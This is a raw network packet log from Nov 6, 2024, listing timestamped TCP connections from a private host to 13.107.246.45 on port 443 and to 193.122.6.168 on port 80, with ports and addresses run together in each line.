                                              Nov 6, 2024 17:02:39.955360889 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.058487892 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.058521032 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.058578014 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.058594942 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.058636904 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.058655977 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.072338104 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.072355032 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.072415113 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.072427988 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.072465897 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.074806929 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.074824095 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.074882984 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.074899912 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.074943066 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.076853991 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.076869965 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.076940060 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.076955080 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.076993942 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.176175117 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.176199913 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.176315069 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.176338911 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.176378012 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.188968897 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.188990116 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.189074993 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.189085007 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.189120054 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.190999031 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.191037893 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.191061020 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.191068888 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.191102028 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.191122055 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.192614079 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.192639112 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.192672014 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.192681074 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.192704916 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.192742109 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.195136070 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.195158005 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.195231915 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.195240021 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.195271015 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.196789026 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.196810961 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.196897984 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.196904898 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.196950912 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.292526960 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.292557001 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.292629957 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.292654037 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.292690992 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.293126106 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.293179035 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.293186903 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.293203115 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.293219090 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.293261051 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.293922901 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.293945074 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.293958902 CET56801443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.293965101 CET4435680113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.387809992 CET56804443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.387890100 CET4435680413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.387950897 CET56804443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.401187897 CET56804443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.401223898 CET4435680413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.403542995 CET56805443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.403592110 CET4435680513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.403647900 CET56805443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.403969049 CET56805443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.403985023 CET4435680513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.407300949 CET56806443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.407340050 CET4435680613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.407403946 CET56806443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.407782078 CET56806443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.407789946 CET4435680613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.410551071 CET56807443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.410586119 CET4435680713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.410644054 CET56807443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.411036968 CET56807443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.411060095 CET4435680713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.413831949 CET56808443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.413866043 CET4435680813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:40.413912058 CET56808443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.414252043 CET56808443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:40.414263964 CET4435680813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.135503054 CET4435680513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.142111063 CET4435680713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.144608974 CET4435680413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.148313999 CET56804443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.148351908 CET4435680413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.148797989 CET56804443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.148804903 CET4435680413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.148933887 CET4435680813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.149051905 CET56805443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.149081945 CET4435680513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.149513006 CET56805443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.149518967 CET4435680513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.149770021 CET56808443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.149791956 CET4435680813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.150125027 CET56808443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.150134087 CET4435680813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.150882959 CET56807443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.150891066 CET4435680713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.151305914 CET56807443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.151316881 CET4435680713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.156742096 CET4435680613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.157046080 CET56806443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.157062054 CET4435680613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.157447100 CET56806443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.157452106 CET4435680613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.275729895 CET4435680513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.275798082 CET4435680713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.275897980 CET4435680713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.275922060 CET4435680513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.275952101 CET56807443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.275990963 CET56805443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.276307106 CET4435680413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.276328087 CET4435680413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.276372910 CET4435680413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.276385069 CET56804443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.276432037 CET56804443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.277013063 CET56805443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.277033091 CET4435680513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.277044058 CET56805443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.277050972 CET4435680513.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.277120113 CET56804443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.277137041 CET4435680413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.277149916 CET56804443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.277154922 CET4435680413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.277678013 CET56807443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.277684927 CET4435680713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.287463903 CET4435680813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.287480116 CET4435680813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.287520885 CET4435680813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.287553072 CET56808443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.287596941 CET56808443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.289531946 CET56808443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.289551020 CET4435680813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.289565086 CET56808443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.289571047 CET4435680813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.290712118 CET4435680613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.290733099 CET4435680613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.290771961 CET4435680613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.290817022 CET56806443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.292498112 CET56810443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.292529106 CET4435681013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.292577982 CET56810443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.293762922 CET56811443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.293812037 CET4435681113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.293864965 CET56811443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.294534922 CET56811443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.294553041 CET4435681113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.294631004 CET56810443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.294646025 CET4435681013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.297365904 CET56806443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.297373056 CET4435680613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.297384977 CET56806443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.297389984 CET4435680613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.300437927 CET56812443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.300470114 CET4435681213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.300532103 CET56812443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.300730944 CET56813443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.300753117 CET4435681313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.300970078 CET56813443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.302680016 CET56812443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.302690983 CET4435681213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.302948952 CET56813443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.302958012 CET4435681313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.306183100 CET56814443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.306190968 CET4435681413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:41.306241989 CET56814443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.306371927 CET56814443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:41.306379080 CET4435681413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.183080912 CET4435681213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.185106039 CET4435681113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.185125113 CET4435681013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.191890955 CET56810443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.191939116 CET4435681013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.192501068 CET56810443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.192513943 CET4435681013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.192795992 CET56812443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.192821026 CET4435681213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.193629026 CET56812443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.193634987 CET4435681213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.194139957 CET56811443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.194175959 CET4435681113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.194577932 CET56811443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.194588900 CET4435681113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.200881958 CET5681580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:42.206974030 CET8056815193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:42.207101107 CET5681580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:42.207334042 CET5681580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:42.213716984 CET8056815193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:42.307109118 CET4435681413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.313350916 CET4435681313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.317286968 CET4435681213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.317378998 CET4435681213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.317488909 CET56812443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.318896055 CET4435681013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.319860935 CET4435681013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.319956064 CET56810443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.321667910 CET4435681113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.321753979 CET4435681113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.321819067 CET56811443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.333673954 CET56814443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.333700895 CET4435681413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.333823919 CET56813443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.333851099 CET4435681313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.334286928 CET56813443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.334291935 CET4435681313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.334887028 CET56814443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.334893942 CET4435681413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.335350990 CET56812443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.335371017 CET4435681213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.335383892 CET56812443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.335388899 CET4435681213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.335474968 CET56810443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.335491896 CET4435681013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.335517883 CET56810443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.335522890 CET4435681013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.335552931 CET56811443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.335580111 CET4435681113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.335593939 CET56811443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.335599899 CET4435681113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.360886097 CET56816443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.360924006 CET4435681613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.360989094 CET56816443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.362895966 CET56817443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.362938881 CET4435681713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.363642931 CET56817443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.363842964 CET56817443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.363852024 CET4435681713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.364186049 CET56816443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.364197969 CET4435681613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.393465996 CET56818443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.393495083 CET4435681813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.393599987 CET56818443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.400599003 CET56818443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.400629997 CET4435681813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.459470034 CET4435681413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.459532976 CET4435681413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.459618092 CET56814443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.459914923 CET56814443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.459933996 CET4435681413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.459944963 CET56814443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.459949970 CET4435681413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.464247942 CET4435681313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.464387894 CET4435681313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.464432955 CET56813443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.465526104 CET56813443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.465544939 CET4435681313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.465557098 CET56813443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.465562105 CET4435681313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.467071056 CET56820443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.467094898 CET4435682013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.467302084 CET56820443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.467645884 CET56820443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.467655897 CET4435682013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.470240116 CET56821443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.470264912 CET4435682113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:42.470474958 CET56821443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.470653057 CET56821443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:42.470662117 CET4435682113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.380105019 CET8056815193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:43.381920099 CET8056815193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:43.381987095 CET5681580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:43.384445906 CET4435681713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.385651112 CET4435681813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.386095047 CET4435681613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.511014938 CET4435682013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.518764973 CET4435682113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.526482105 CET56817443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.536577940 CET56818443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.536859035 CET56816443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.630340099 CET56820443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.723329067 CET4435682113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.723390102 CET56821443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.742532015 CET56821443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.742552042 CET4435682113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.743391037 CET56821443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.743396044 CET4435682113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.743930101 CET56820443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.743952036 CET4435682013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.744875908 CET56820443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.744880915 CET4435682013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.745311975 CET56817443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.745328903 CET4435681713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.745961905 CET56817443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.745966911 CET4435681713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.746423960 CET56818443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.746452093 CET4435681813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.747060061 CET56818443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.747065067 CET4435681813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.747309923 CET56816443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.747325897 CET4435681613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.748039007 CET56816443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.748044014 CET4435681613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.869246960 CET4435681713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.869334936 CET4435681713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.869389057 CET56817443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.870150089 CET4435682013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.870693922 CET4435682013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.870740891 CET56820443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.870954037 CET4435682113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.871006966 CET4435682113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.871053934 CET56821443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.878547907 CET4435681813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.878670931 CET4435681813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.878720999 CET56818443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.902570009 CET4435681613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.902641058 CET4435681613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.902689934 CET56816443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.942051888 CET5681580192.168.2.6193.122.6.168
                                              Nov 6, 2024 17:02:43.944046021 CET56817443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.944081068 CET4435681713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.944099903 CET56817443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.944106102 CET4435681713.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.947011948 CET8056815193.122.6.168192.168.2.6
                                              Nov 6, 2024 17:02:43.947037935 CET56818443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.947037935 CET56818443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.947071075 CET4435681813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.947082996 CET4435681813.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.949531078 CET56816443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.949538946 CET4435681613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.949547052 CET56816443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.949554920 CET4435681613.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.951983929 CET56820443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.952030897 CET4435682013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.952050924 CET56820443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.952058077 CET4435682013.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.954572916 CET56821443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.954572916 CET56821443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.954598904 CET4435682113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.954610109 CET4435682113.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.988327026 CET56822443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.988390923 CET4435682213.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.988461018 CET56822443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.990689039 CET56823443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.990717888 CET4435682313.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.990775108 CET56823443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.992383003 CET56824443192.168.2.613.107.246.45
                                              Nov 6, 2024 17:02:43.992432117 CET4435682413.107.246.45192.168.2.6
                                              Nov 6, 2024 17:02:43.992515087 CET56824443192.168.2.613.107.246.45
